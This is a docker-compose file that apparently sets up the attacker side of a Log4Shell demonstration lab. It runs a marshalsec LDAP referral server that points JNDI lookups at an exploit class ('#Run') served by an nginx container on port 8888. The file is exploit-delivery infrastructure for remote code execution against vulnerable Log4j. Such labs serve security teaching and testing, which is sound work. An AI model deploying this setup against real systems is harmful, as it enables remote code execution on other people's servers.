version: '3.5'

services:
  ldap-server:
    build: attacker-server/ldap-server/
    container_name: ldap-server
    ports:
      - 1389:1389
    entrypoint:
      - java
      - -cp
      - /usr/app/marshalsec-0.0.3-SNAPSHOT-all.jar
      - marshalsec.jndi.LDAPRefServer
      - http://127.0.0.1:8888/exploits/#Run
    restart: always
    networks:
      log4j:
  web-server:
    build: attacker-server/web-server/
    container_name: web-server
    ports:
      - 8888:8888
    volumes:
      - ./attacker-server/web-server/conf:/etc/nginx/conf.d
    restart: always
    depends_on:
      - ldap-server
    networks:
      log4j:

networks:
  log4j:
    driver: bridge
